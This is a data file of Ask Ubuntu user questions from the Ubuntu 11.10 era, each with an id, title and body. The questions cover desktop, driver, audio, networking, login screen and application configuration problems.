68816	power manager does n't show battery charging	i just upgraded to 11.10 last night and i noticed that power manager does n't update the battery charge % . it 's been plugged in for hours and the energy has n't changed ( it neither went up or down ) . is this a bug with the new version ?
68819	swap two keys using xmodmap	my `` return '' key is broken . i followed the instructions here : http : //www.ehow.com/how_2180748_command-linux-swap-keyboard-keys.html - hoping to reassign my | key as the new return key . my .xmodmaprc file reads as follows : keycode 51 = 36 but the | key does not act as a return key . nothing has changed . any ideas what i might be doing wrong ? thanks so much for any suggestions .
68820	left edge mouse hoover does n't bring up unity menu when fullscreened	when i have an app full-screened in 11.10 , hoovering my mouse on the left edge does n't bring up unity menu . i have three 11.10 computers and this is only happening on the dual-screen twin-viewed nvidia box . any ideas what 's wrong ?
68826	how can i add more workspaces ?	i have searched and read through other answers , but i could n't find one . i ca n't change then number of workspaces . compiz desktop size in general settings does n't work . i 've tried some gconf commands , but that does n't work either .
68827	deeper drop shadow for focused windows gone in 11.10	in 11.04 , the window in focus had a deeper drop shadow to make it look like it was closer to the user . this feature seems gone in 11.10 . was this intentional and will this behavior return ?
68837	empathy audio call , video call , desktop sharing and file sending not working	when trying to make a video or audio call from a gmail account to another gmail account it throws a window error with the following output : there was an error starting the call i have the gmail plugin to talk and checked any empathy extensions needed for this . the problem happens only on 11.10. in 11.04 it works correctly . the problem has expanded to desktop sharing and sending files . both of which do not work either . i think this is all related to a common problem . update - desktop sharing can be solved by activating vino-preferences and configuring in the host . after that tell the empathy host to `` share desktop '' . it should work . file sharing has been solved in one of the updates that came several days ago . the issue still exists for audio and video . update 2 - since around june 2012 in 12.04 the option about activating vino-preference to have desktop sharing is not working .
68840	how to quickly respond to empathy message in unity ( similar to gnome-shell )	i have seen the way you can respond to messages in a nice quick way in gnome-shell with a message window popping out from the bottom . how can this be applied in unity for a window to pop up and just quickly click on it to respond to the user .
68841	how do i remove a pc from the synced list	is there a way to erase one pc from the list ( of the synced computers ) created on the left side of the software center ? i mean , the pc is not listed in the ubuntu one panel ( not synced ) anymore , but i have it in the software center and all the applications of the various computers ( new ones and old ones , synced and not synced anymore ) are still there . any way ?
68846	u1 control panel is dead since upgrade to edubuntu 11.10	i upgraded to oneiric ocelot first day , and now the u1 control panel is dead -i ca n't access neither my account details , nor my cloud folders , nor my devices through it , it just keeps loading . it does sync , though , and both my 11.04 `` natty '' laptop and the windows version ( side-by-side installation with winxp ) on this desktop machine work just fine . what can i do ? i mean , i 'm rather partial to working control panels ... . cheers , jay
68850	how do i apply changes to the keyboard layout system-wide ?	in gnome 's keyboard settings there used to be an `` apply system-wide '' option , but in oneiric this is now no longer the case . if i use the keyboard settings to change my keyboard layout , the changes are applied only in my session ; on the login screen , the old keyboard layout still applies . how can i apply a different keyboard layout to my entire system ?
68856	how do i keep my screen from going dim when idle ?	apparently , the new version of unity is based on gnome 3 . apparently , gnome 3 decided to do away with a huge chunk of the options available to me . it used to be that when i went to system settings - > power settings , i could keep my screen from going dim when idle -- and things like that . is there any way for me to change those settings now ? or am i doomed to have my screen go dim when i let my computer go for five seconds ?
68858	where can i get themes ?	upgrading from 11.04 to 11.10 did away with my themes , without warning me . i ca n't seem to find any way to customize the themes ( short of going into theme files and messing with those , and i 'm not quite ready to do that yet ) . and i ca n't find any themes online . i 'm not enjoying ambiance , or radiance , or any of the ones offered by default . where can i find themes for ubuntu 11.10 ?
68859	power management shortcut	i am looking for a custom shortcut for showing power managemnt ( like ctrl + alt + delete in ubuntu 10.10 that showed some tools for shutdown , suspend , restart , ... ) i do n't know which command does this . for example for showing system monitoring custom shortcut command is gnome-system-monitor . but i do n't know what is for power . thanks , m.varmazyar
68861	how can i edit gtk+3 themes ( preferably with a gui ) ?	( similar problem to one in a question i had before , but i need multiple solutions , and i felt they were better organized as separate questions ) upgrading from 11.04 to 11.10 did away with my themes , without warning me . and i ca n't find any themes online . i 'm not enjoying ambiance , or radiance , or any of the ones offered by default . i found a couple that i kind of like online , but they 're not quite right . instead of looking for somebody who coincidentally came up with the perfect theme for me , i 'd like to find something close , and edit a few pieces to fit my tastes . particularly ... i do n't like gray . i get why sometimes you wand a bit less contrast , but most of the time , gray just makes me unhappy . so i want to give my theme much more contrast in colors , with perhaps some shade of blue where i feel actual color is necessary . these sorts of edits were simple enough back in 11.04 . i ca n't find a way to make them in 11.10 . i ca n't seem to find any way to customize the themes . i really want to customize my themes . this is ubuntu . i know i can . what 's the simplest way for me to do it ?
68865	sound reverts to 2 channels from 5.1 + analog	after installing ubuntu 11.10 , i configured my sound settings to be 5.1 + analog input . it works ok , but after closing and reopening banshee , the sound channels reverts back to 2 channels , this also happens on changing the song ( ie . next , previous ) and also after a reboot . the configuration dialog is still selected `` 5.1 + analog input '' but there no 5.1 sound at all , only the default stereo 2 channels only . to fix it i have to open sound settings and in the output tab reselect `` internal analog surround 5.1 '' is this fixable ?
68868	how do i disable application groupin in ubuntu 11.10 alt + tab application switcher ?	in ubuntu 11.10 the alt + tab application switcher shows the applications grouped by executable apparently . i find it very annoying that i have to take an extra step when switching between windows with that are grouped ( for example two instances of an ide or anything else like that ) . is there any way to ungroup the applications in the switcher and have it show one icon per window ? i 've looked among the settings and google without luck . seems like i '' me the only one annoyed by this issue .
68869	how can i stop xcompmgr from drawing shadows on dragged icons ?	whenever i drag icons around in nautilus , xcompmgr treats them as ordinary windows and draws big fat shadows over them . this behavior is a little strange . is there a way to disable it ?
68870	how do i install the drivers for my ati 6850 graphics card ?	how do i install the drivers for my graphics card , which is an ati 6850 ? i know that sometimes things stop working when i download a third-party driver , so i 'd like to know the right way to do this .
68872	problem logging in with an old home account	i have just installed ubuntu 11.10 and i am trying to use an old user home directory . my network is set up with a nis server for authentication . i have installed nis package and configure the passwd , shadow and group files . the home directory is mounted using nfs . the old user is unable to log in , the login screen just returns without logging in . but if i create a new user in my nis server , this user works just fine . i suppose it is an issue with the files of the old user , but i have already moved all the hidden files and folders to a ~/oldconfig/ , and still no joy . any ideas ?
68873	sharing any network connection starts a connection/disconnection loop	am trying to share an internet connection to another pc . i have tried doing it wirelessly and wired . both ways when trying to share it connects and disconnects several times until failing to connect at all . it repeats this a couple of times and then just drops . if i try to connect again it does the same pattern again . my pc has an intel card which receives the internet connection . another wired card , a realtek shares this connection to another pc . same goes for a broadcom and a ralink wifi cards . i tried both of them to share a wifi connection with no such luck ( both installed and already working to connect to anybody ) . they of course connect but they do not share . this , all of this worked perfectly on 11.04 . what could be the problem for all network interfaces not been able to share a connection .
68875	getting colord to work	i recently updated to 11.10 and was checking out the color application in the system setting menu . when i read up about colord i got excited because i 've been having problems with washed out external monitors with ubuntu . i got as far as adding some 'color profiles ' to my external monitor but there does n't seem to be any effect . my understanding of what colord should be able to do is modify the color data that goes to the device so that it looks 'better ' . have i got this wrong ? i 've tried several different available color profiles but my monitor still looks very washed out ( esp . greys and lighter colors ) any suggestions ? thanks in advance ,
68881	how can i install this new pci card with sata ports ?	i am trying to install this new pci card : http : //www.nilox.es/scheda/nilox/pci-1sata.htm but i do not know how to identify it when running the lspci command , it does not seem to be in the list . anyone has tried to install it in ubuntu 11.04 ?
68882	messaging menu indicator does not work for thunderbird	i updated to oneiric recently and now the messaging menu is not working properly for thunderbird anymore . when i get a new e-mail , the envelope does not change at all ( no visible notification ) . additionally no bubble appears telling me about the new message . how can i change this behavior ?
68885	copying vboxadditions to usr/share/virtualbox folder	since for some reason vbox does not find the additions on the internet , i was trying to install them in the ubuntu directory vbox is looking for them - which is : usr/share/virtualbox but i am denied permission to do so . any way around it ? i am relatively new to ubuntu ( know how to use the gui , but still learning how to talk to the machine proper , so many things will be new to me ; used to be power user/analyst for ms windows , 98-vista , so not a pc newbie , but still i 'd say linux newbie ) . any suggestion is more than welcome ! thanks joe
68887	clicking shutdown shuts down immediately instead of showing dialog . can not restart	in ubuntu 11.10 oneiric ( unity ) , clicking on shutdown will immediately shut down the machine instead of prompting with restart / shutdown option dialog .
68888	how to install xfce in ubuntu 11.10	any ideas how to install xfce in 11.10 ? i do n't want unity or gnome 3 , but the xubuntu dektop seems to be not available in ubuntu 11.10 jeannie
68893	expected a dual boot system with windows vista , but it only boots ubuntu	i told my friend that i would create a dual boot system with his windows vista and not screw it up . it only boots to ubuntu with no boot menu . at least it kept the compressed windows partition . how do i get a dual boot system without being a rocket scientist before he comes home and breaks my neck ?
68901	save contacts in thunderbird so that they are `` ubuntu one '' -ready	now that thunderbird has become the default email client , i want to save my contacts in it . however , there are 2 different default address books : `` personal address book '' which seems to be the default from thunderbird , and `` personal '' which seems to have been added for ubuntu . i want my contacts to be ready to sync with ubuntu one ( when available ) just with a copy/paste . the problem is that these to address books have different fields for contacts ( try to add a new contact ) . `` personal '' is the closest to the one in evolution except for tags which is not present ( and maybe others ) . what is the recommendation ? thanks
68902	using curl with filename containing a dynamic date	i 'm trying to upload dynamically created log file from my local box to my ftp server . this all happens in a cron job ( crontab ) i run every night . it creates the file using : 30 00 * * * touch ~/desktop/logs/ '' log $ ( date +'\ % m\ % d\ % y ' ) '' which works just fine . however , when i try to upload the file using the same syntax : 50 00 * * * curl -t ~/desktop/logs/ '' log $ ( date +'\ % m\ % d\ & y ' ) '' -u user : pass ftp : //example.com/logs/ it gives me the following error : date : extra operand i also tried it without escaping the the % : curl -t ~/desktop/logs/ '' log $ ( date + ' % m % d % y ' ) '' -u user : pass ftp : //example.com/logs/ which works in the normal command line , but when executed via the crontab , gives the following error : /bin/sh : syntax error : unterminated quoted string any ideas how to successfully upload the daily log to my server ?
68904	google earth shows a black screen and options are greyed out	i have installed the latest .deb google earth from google , but the google window is black ( where the earth should be ) plus all 3d options are greyed out . i have checked my graphics card , and 3d is enabled . as shown here : pst007x @ pst007x-ubuntu64 : ~ $ /usr/lib/nux/unity_support_test -p opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri intel ( r ) ironlake mobile opengl version string : 2.1 mesa 7.11 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes pst007x @ pst007x-ubuntu64 : ~ $ i have never been able to get google earth to work on radeon , nvidia and intel cards . i have followed installation instructions , but no luck . what is odd that in the options menu , the 3d settings page is all greyed out , i am unable to select any option . i have looked at other threads and no answers . i have set my dns to manual , ipv6 is off ... . i am at a loss on this one ... update : i now get the error : we are unable to connect to the google earth servers however i do not use a proxy . i tried opening all ports in my routers firewall . still only a black window . now using ubuntu 11.10 64bit..
68906	how can i get my geforce 6200 working properly ?	clean install on and older machine , the nvidia 173 drivers are supposedly installed but x launches with 640x480 resolution , with no option to adjust it . it is next to impossible to use the system like this , i was hoping for a dual-screen setup i do n't care about the 3d eye candy as long as i can use this thing in 2d mode . searching around i have not found much helpful for my situation , any advice would be greatly appreciated .
68907	trouble recognising external monitor	i 'm a first time ubuntu user ( using ocelot ) and know very little about computers . my laptop screen is broken and i 'm trying to connect to an external monitor through a vga cable but i ca n't get the system to recognise the new monitor . i 've tried using different drivers and settings in nvidia , the function key , as well as entering xrandr -- output vga1 -- auto into the terminal . it just says output vga not found but it recognises there 's a monitor in nvidia . i know it is possible to do since my friend who put this os on my computer did it last night , but we ca n't do it again after restarting the computer .
68909	problem printing in libreoffice writer but not in adobe acrobat reader or evolution	i recently upgraded to 11.10 . i use an hp laserjet p1102w printer . since the upgrade , libreoffice writer does not print several letters . adobe viewer and evolution do print perfectly , as before . nobody seems to have reported anything like that . i would welcome clues on how to tackle this puzzling behavior .
68910	what is this hidden unity window-dragging feature i discovered on accident , and how do i reproduce it ?	i was just idly mousing over folders in nautilus on my laptop , when all of a sudden these window-dragging icons appeared and i was moving my window across the screen . look at the screenshot to see what i mean . what was that , and how do i turn it on again ? because that looked really cool . i tried , but could n't get it to display again . this is an unmodified ubuntu 11.10 upgraded from ubuntu 11.04 , on a toshiba satellite a505 . i was using the touchpad .
68918	how do i restrict my kids ' computing time ?	access to our computer ( not only to the internet ) needs to be restricted for the accounts of my kids ( 7 , 8 ) until they are old enough to manage this by themselves . until then we need to be able to define the following : the hours of the day when computing is o.k . ( e.g . 5 - 9 pm ) the days of the week when computing is not o.k . ( e.g . mondays to fridays ) the amount of time allowed per day ( e.g . 2 hours ) in 11.10 all of the following that used to do the job do n't work any more : timekpr : for > 11.10 no more available through the ppa . timoutd : command line alternative , but from 11.10 removed from the repositories . gnome nanny : looks great but repeatedly crashes to force restarting x-server . so we ca n't use or recommed this program at the moment . are there any other alternatives ?
68922	ca n't compile program that uses sdl after upgrade to 11.10 - undefined reference to sdl_init	i 've just upgraded from 11.4 to 11.10 and at least one thing seems to be broken : i have a c++ program that is using sdl and opengl . i was able to compile and run it just fine before the upgrade . now i get linker errors , for example undefined reference to `sdl_init' i have libsdl1.2debian and libsdl1.2-dev packages installed , i believe that is all i need ( but i might be wrong ) . i compile the program like this : gcc -i /usr/include/sdl -lsdl -o test test.cpp any idea what can be causing this ?
68923	sound playback produces unwanted noise ( `` popping '' , etc . )	so , i installed ubuntu 11.10 on my laptop and everything went smoothly , except for the sound . i consulted the ubuntu wiki and several other support sites , telling me to edit the alsa configuration file and add a line to disable power management . before i did that though , i ran across a script that would collect information about my system and put it on the alsa project page . the output : http : //www.alsa-project.org/db/ ? f=b39cc6b1a7b17ba2f12fc0c74a4beae0855e6d4e there is a line that says that power save was already disabled . it 's as follows : `` snd_hda_intel : power_save=0 '' , so i did not edit the file because it 'd be useless . so , since that option is apparently out of question , what else can i do ? some additional information : -card : realtek alc662
68926	ugly shadows around applications	when i updated to 11.10 , i thought that any problems would be solved and all graphical glitches would be better . after upgrading , my whole system got borked , and everything looked ugly . i ended up fixing most everything , but for one thing . the shadows for any application is ugly . it is hard to describe , so i hope the picture helps . notice the odd shadows . they also are common after closing a window or moving it to a different workspace i know this is a small problem , but it still bugs me . any fix for it ?
68930	does anyone know why work spaces move randomly ?	i made the fatal mistake of upgrading my system to ubuntu 11.04 . this thing is so broken it took me weeks to get it to even boot . my problem now is that after a while ( anywhere from 5-72 hours ) the screen goes insane , and windows start randomly moving around to different workspaces . this is a huge problem for me as i have 6 workspaces and 3 monitors . does anyone know why this happens and how i can prevent it from happening . system specs ( call to lspci ) 00:00.0 host bridge : ati technologies inc rx780/rx790 chipset host bridge 00:02.0 pci bridge : ati technologies inc rd790 pci to pci bridge ( external gfx0 port a ) 00:09.0 pci bridge : ati technologies inc rd790 pci to pci bridge ( pci express gpp port e ) 00:0a.0 pci bridge : ati technologies inc rd790 pci to pci bridge ( pci express gpp port f ) 00:11.0 sata controller : ati technologies inc sb7x0/sb8x0/sb9x0 sata controller [ ide mode ] ( rev 40 ) 00:12.0 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.2 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.2 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : ati technologies inc sbx00 smbus controller ( rev 42 ) 00:14.1 ide interface : ati technologies inc sb7x0/sb8x0/sb9x0 ide controller ( rev 40 ) 00:14.2 audio device : ati technologies inc sbx00 azalia ( intel hda ) ( rev 40 ) 00:14.3 isa bridge : ati technologies inc sb7x0/sb8x0/sb9x0 lpc host controller ( rev 40 ) 00:14.4 pci bridge : ati technologies inc sbx00 pci to pci bridge ( rev 40 ) 00:14.5 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ohci2 controller 00:15.0 pci bridge : ati technologies inc device 43a0 00:16.0 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:16.2 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ehci controller 00:18.0 host bridge : advanced micro devices [ amd ] family 10h processor hypertransport configuration 00:18.1 host bridge : advanced micro devices [ amd ] family 10h processor address map 00:18.2 host bridge : advanced micro devices [ amd ] family 10h processor dram controller 00:18.3 host bridge : advanced micro devices [ amd ] family 10h processor miscellaneous control 00:18.4 host bridge : advanced micro devices [ amd ] family 10h processor link control 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) 03:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 03 ) 04:00.0 ide interface : jmicron technology corp. jmb368 ide controller 05:00.0 vga compatible controller : ati technologies inc cayman pro [ amd radeon 6900 series ] 05:00.1 audio device : ati technologies inc device aa80 i 'm on ubuntu 11.04
68931	how can i fix hdmi hdtv overscan when i can not change settings on my tv ?	i am new to ubuntu , and i seem to be having an issue . i just upgraded my desktop to ubuntu 11.10 64bit after windows 7 kept blue screening me . when installing ubuntu , the picture was fine , but as soon as i restarted for the first time to finalize the installation , the edges of my desktop extended past the edges of my monitor . i read other posts about such problems , and now know that it 's called overscanning , but the other posts were n't really helpful . i am not able to change the aspect ratio in the tv itself , because the setting is grayed out . i can only select widescreen , or automatic ( automatic does nothing ) . i 'd appreciate any help you can provide in helping me solve this problem . my specs are as follows : nvidia geforce 9800 gt msi x58m mobo intel i7 920 6gb ocz ddr3 1066 tri-channel magnavox hdtv
68932	ca n't sync with ubuntu one through a proxy server	i have been using ubuntu since 8.04 . the problem is that with every new release , ubuntu one seems not to work in my network . i use a campus network meaning that i connect to the internet via a proxy server . please help since ubuntu one seems not to resolve proxies ...
68934	ati radeon x1200 series ( rs690m ) graphical drivers problem	in the brand new ubuntu 11.10 the drivers of ati radeon x1200 series ( rs690m ) seems to be broken . even when moving single window , it 's barely moving . the drivers in 11.04 were working very well till the upgrade . when we can expect the thins working back again ?
68939	issues with bluetooth connections in 11.10	i 'm having a couple of issues that i did not have in 11.04 or 10.10 . the first issue involves connecting to my bluetooth headset . i am able to successfully pair and connect to my samsung headset for the first time . but as soon as i turn off the headset and later try to reconnect , i 'm not able to reconnect the headset . when i try to activate the connection from the settings dialog , the switch toggle back and forth automatically between on and off and never reconnects . i should mention that i had no issues with the 11.10 beta version using the same exact headset . i have no issues connecting to my bluetooth mouse on the same laptop . however , when i disconnect the bluetooth mouse , the trackpad is not automatically re-enabled . i have to log out and log back in to re-enable the trackpad after disconnecting the bluetooth mouse . i 'm using 11.10 with all the latest patches .
68940	how do i setup ssl crt on my apache2 server ?	i just got from godaddy a ssl certificate . i downloaded the files ... but now i am wandering where i should put them . and is there anything else i need to setup ? the reason i am asking because i am receving conflicting ways of how to setup the ssl on a apache2 server . they say use ssl.conf but i found two on my server : /etc/apache2/mods-available/ssl.conf /etc/apache2/mods-enabled/ssl.conf then they say i have to add these instructions : sslcertificatefile /path/to/your/certificate/file sslcertificatekeyfile /path/to/your/key/file sslcertificatechainfile /path/to/intermediate/bundle/file also they say that it might not be in the ssl.conf but in the httpd.conf file ... so wich is it ? and if i use ssl.conf wich file must i modify ? thanks in advance for any help . update : here is my config : < virtualhost 00.00.000.00:443 > servername example.com serveralias www.example.com serveradmin webmaster @ example.com documentroot /var/www/example.com # ssl engine switch : # enable/disable ssl for this virtual host . sslengine on # a self-signed ( snakeoil ) certificate can be created by installing # the ssl-cert package . see # /usr/share/doc/apache2.2-common/readme.debian.gz for more info . # if both key and certificate are stored in the same file , only the # sslcertificatefile directive is needed . sslcertificatefile /etc/ssl/certs/example.crt sslcertificatekeyfile /etc/ssl/private/example.key # sslcertificatechainfile /etc/ssl/certs/gd_bundle.crt < /virtualhost > it seems that godaddy cert . is not reconized by google chrome for some reason ... so what is the sslcertificatechainfile ?
68945	how to change screen brightness on a lenovo e46a ?	i am using lenovo e46a in window i was able to change screen brightness with the control ( fn ) but now in ubuntu i ca n't change it the cursor shows but brightness does n't change a bit ... .so someone please help me .
68953	do n't list all users at login with lightdm	i just upgraded to ubuntu 11.10 and i was wondering if it 's possible to not list all the current users and instead require the user to type in their username ? my company 's it policies require that users not be listed on login screens . in ubuntu 11.04 , i was able to do this with the following commands ... $ sudo -u gdm gconftool-2 -- type boolean -- set /apps/gdm/simple-greeter/disable_user_list true
68955	configure mousepad double-tap to work the way i want ?	i have a laptop with an ubuntu 11.10/win7 dual boot system . in windows , i use double-stroke to scroll , which i 've got working in ubuntu as well . this i did by changing the settings under system settings\mouse and touchpad - real easy . however , in windows i can also use double-tap as a `` middle click '' in some contexts - for example , if i double-tap a tab in chrome , the tab closes ; if i double-tap a link , it opens in a new tab . in ubuntu , double-tap instead behaves like a right-click . on double tap in both the previous examples , a context menu is shown instead of the action i want . how do i change this configuration in ubuntu to do what i want and am used to ?
68957	how do i move all my data from evolution to thunderbird ?	i have searched google and can not find an easy solution to move all mail and calendar information from evolution to the now default thunderbird . i have added lightening as an add-on to thunderbird . is there such a tool for mail , address books and calendars ? ?
68961	what can i use instead of gnome-open ?	what is a current replacement of 'gnome-open ' command ( generic open of files based on the type ) ? before : gnome-open mydoc.pdf # opened pdf in default application now : gnome-open the program 'gnome-open ' is currently not installed . you can install it by typing : sudo apt-get install libgnome2-0
68962	how to drag a folder to the launcher from nautilus	how can i add a folder to the launcher for quick access to it . in this particular case i wish to drag it to the launcher .
68963	show banner at login with lightdm	i just upgraded to ubuntu 11.10 and i was wondering if it 's possible to show a login banner with text ... my company 's it policy requires that some generic text be shown at login . i 've seen where you can change the background , so i guess i could make a background with the text in it , but i wanted to see if there is another way . in ubuntu 11.04 , i was able to do this with the following commands ... sudo -u gdm gconftool-2 -- type string -- set /apps/gdm/simple-greeter/banner_message_text `` `cat issue.txt` '' sudo -u gdm gconftool-2 -- type string -- set /apps/gdm/simple-greeter/banner_message_text_nochooser `` `cat issue.txt` '' sudo -u gdm gconftool-2 -- type boolean -- set /apps/gdm/simple-greeter/banner_message_enable true
68966	how to drag a folder to the side panel in nautilus	i am trying to drag a folder ( example /var/www ) to the side panel in nautilus so when i open nautilus i can just go to it quickly . i know that entering the folder i want to drag to the side panel and pressing ctrl+d will add this to the bookmark section of the panel but i want to drag it instead of doing the key combination . is this possible and if yes how ?
68970	upstart scripting : start service and immediately run another command	here is my current upstart script i 've placed at /etc/init/redis.conf : description `` redis server '' start on runlevel [ 2345 ] stop on shutdown exec sudo /opt/redis/redis-server /opt/redis/redis.conf post-start exec sudo chmod 777 /tmp/redis.sock respawn what i am trying to do is start the redis server , then once its running immediately change the permissions of the socket file it creates to be more permissive . unfortunately there is currently no way to configure redis to set the socket permissions to anything other than 755 , which is too restrictive for my use case . this script does not work . it effectively starts up the redis server but the unix file permissions remain the same . any idea how i can go about accomplishing the goal of changing the socket permissions right after redis starts while retaining the ability to manage redis through upstart ?
68971	how to move calanders from evolution to lightning	how do i move/copy calendars from evolution to lightning ?
68976	how can i create themes for gnome shell ?	what makes me feel good in linux is customization . i 've recently tested some great themes for gnome shell . they 're really great , but sometimes i do n't like some part of them . i looked into the files and found out that the themes are css-based . i know css , but i do n't which classes or ids refer to which parts of the screen . is there any reference or guide for theming gnome shell ? ( not gtk3 )
68978	how can i install haskell-hunit ?	i 'm running 11.10 ( amd64 ) . i see there 's this package : http : //packages.ubuntu.com/source/oneiric/haskell-hunit however : $ sudo apt-get install haskell-hunit reading package lists ... done building dependency tree reading state information ... done e : unable to locate package haskell-hunit how should i resolve this ?
68983	amd catalyst control center crashes silently when i click 'apply ' after changing dual monitor settings , unless run from terminal window	amd ccc crashes when i hit 'apply ' after changing dual monitor settings procedure : i open amd catalyst control center i select 'display manager ' on the left i choose the 'multi-display desktop ' option i set both monitors to their max resolution ( 1920x1200 and 1600x1200 ) when i click the 'apply ' button ccc closes without any sort of message ( expecting it to tell me that a restart is required ) , and without ( visibly ) changing any settings . note : i copied the command line from the applications menu shortcut , and ran it from within a terminal window . when i click 'apply ' it completes successfully , shows the message i 'm used to , and the settings are applied next time i log in . this has happened to me before when attempting to find an error message printed to the terminal but instead the application works just fine . ( the application was minecraft )
68985	remember folder when browsing file	for uploading a file to the internet , i browse the folder to find a file . how to set ubuntu to remember the last folder browsed instead of opening the default home folder when trying to upload another file .
68986	how can i send current line in gedit to terminal ?	when editing shell file in gedit , is there a way i could send current line ( or selected block ? ) to terminal ? when learning python i use spyder ide . it has an option to execute code selection or block in the console . which i found very useful in learning what my scripts are doing step by step ( or not doing ; ) . any chance to have something like that with gedit ? or any other text editor ?
68988	simple launcher to minimize all windows ?	is there a simple way to create a launcher for unity that minimizes all windows or , ideally , toggles ( e.g. , like ctrl+alt+d ) ? if so , what is it ?
68995	gnome shell thunderbird mail notification	does anyone know of a way to get persistent gnome 3 panel notifications in gnome 3 in oneiric ? it 's one of the few things holding me back from using gnome 3 regularly . i 've actually found a way of moving the notifications from the ( usually ) hidden bottom bar to the top , but it does not move the thunderbird icon . the icon also only tends to appear the first time mail is received . i 'm very surprised this basic piece of functionality does n't exist for gnome shell .
68997	certain symbols not printed by evince ( or lp ) but ok with acroread	i am trying to print a pdf file that contains some symbols . it is shown perfectly on screen by both acroread and evince . however , printing through evince leads to square boxes around where the symbol ( a sub-scripted 1/2 ) should be . i get the same poor result using lp . i have seen this problem in the past for various special characters : ff , parts of equations etc . this appears to be working on a colleagues version of evince under gentoo . all fonts are claimed to be included ( and , evidently , are n't a problem when displaying on screen ) : pdffonts ~/output.pdf name type emb sub uni object id -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- - -- - -- - -- -- -- -- - ukujem+jfbviy+arialmt cid truetype yes yes yes 5 0 fehszy+ltxgiv+timesnewromanpsmt cid truetype yes yes yes 6 0 aimhgu+ymotnn+timesnewromanpsmt cid truetype yes yes yes 7 0 ` the printer is a hp cp 2025 .
68999	mounting truecrypt fails with `` error : device-mapper : reload ioctl failed : invalid argument ``	i 've been using truecrypt for several years now . today i upgraded to 11.10 and mounting with truecrypt failed with this message : error : device-mapper : reload ioctl failed : invalid argument on some googling i found that this could be a problem if the kernel is not compiled with xts support and the solution was to use `` -m=nokernelcrypto '' option . this works for me but this is less than ideal since there will be a performance hit . can anyone tell me how to get the stock 7.1 version of truecrypt to work on ubuntu 11.10 natively , seems like this should be a major issue if truecrypt support was pulled from ubuntu .
69000	fixing broken config/permissions on a clean 11.10 install with an old home dir	so i took the plunge and did a clean install of ubuntu 11.10 rather than an upgrade , safe in the knowledge that my home dir would be safe on its own partition like it has always been for years . after the install though , i had many issues - sound was broken , the network manager applet would not detect any devices , i could n't shutdown or logout . the .xsession-errors file is full of lines like : ** ( gnome-settings-daemon:1591 ) : warning ** : failed to get session for pid : gdbus.error : org.freedesktop.consolekit.manager.generalerror : unable to lookup session information for process '1591' ( pastebin link : http : //pastebin.com/download.php ? i=7gmqczbn ) overall this seems to suggest there are some old permissions/configuration causing serious problems . the issue does n't appear with the guest session , or a fresh account ( which i had to create using the guest session as i could n't unlock anything with my main account ) . i 've tried backing up things like .gconf and deleting to see if that would fix it , but overall i 'm stumped . has anyone else had this issue with an upgrade/install with an old home dir ? can anyone offer some pointers ? edit : this now seems to be some issue related to consolekit . if i run ck-list-sessions on a new user it prints out a bunch of stuff about the session , but not on my old user . still no idea why though : /
69001	volume blinking up and down rapidly on gnome shell	i 've been having this problem where the volume goes up and down extremely fast and it makes the audio of videos sound like they 're skipping . does anyone know how to fix this ? edit : in the sound preferences , on the output tab the connecter : is switching from analog output to analog headphones , this is what is probably changing the volume .
69002	make different applications to use different connections	is it possible to get an application like transmission to use the mobile broadband connection and say chrome to use the wifi connection ? is there a way to set some rules for this ?
69003	which ati driver should i use for a radeon xpress 200m ?	so my laptop that i 'm using with ubuntu 11.10 so far is working great . the thing is that in the driver on my system info says its using gallium 0.4 on ati rs480 . my laptop is old and is using the igp of the ati radeon xpress 200m . i looked around and not understanding whats going on , but it seems there is 2 versions . the xerver-xorg-video-ati and the fglrx . question 1 : is the gallium driver showing in the system info is the open source driver ( xerver-xord-video-ati ) mentioned ? question 2 : is there a point in using the fglrx version ? question 3 : should i stay with what i have or should i get fglrx ? side note : upon checking one of the questions recommended , i did run the unity support test and unity 3d supported does show `` yes '' along with every other test .
69005	wicd tray icon does n't show	i installed wicd and it works fine , but the tray icon does n't show . i 've tried with wicd-client but only a notification shows up . root @ prat-vgn-nr21m-s : ~ # wicd-client has notifications support true rename failed loading ... connecting to daemon ... connected . displaytray true done loading . in addition , under kubuntu session the tray icon shows normally . thanks in advance .
69008	how can i configure mythbuntu 11.10 to wait for a dchp lease before completing boot and starting network dependent apps ?	i have a clean install of mythbuntu 11.10 acting as a frontend only . it is networked using eth0 and i have a router acting as a dhcp server on the same subnet . the frontend boots and automatically logs on and runs myth frontend . however approximated every 3 out of 4 boots , the box has not yet obtained an ip address via dhcp before myth starts . this causes myth to enter a configuration mode . if i cancel out , then myth starts normally , as the dhcp response has been received . how do i change the boot to wait for a dhcp response before logging on ?
69010	is there a way to tell where synclient gets its information from ?	i have a macbook 2,1 running mint katya and the touchpad config has been driving me nuts . xorg.conf seems to be ignored , so for now i 've just been getting rid of it . running synclient , i can get things how i want them , but what 's interesting is that it 's clearly pulling the information from somewhere other than xorg.conf , or xorg.conf.d/synclient . i 've got just about every touchpad configurator in the known universe on here , and also have a bunch of de 's installed , so it 's impossible for me to tell what 's `` canon '' , so to speak . xorg.conf is currently blank . xorg.conf.d synclient.d is as follows : section `` inputclass '' identifier `` touchpad catchall '' driver `` synaptics '' matchistouchpad `` on '' matchdevicepath `` /dev/input/event* '' endsection i 've also got the mactel support libraries installed , but i ca n't figure out where the actual settings for appletouch are . can anyone lend a hand ? thanks in advance .
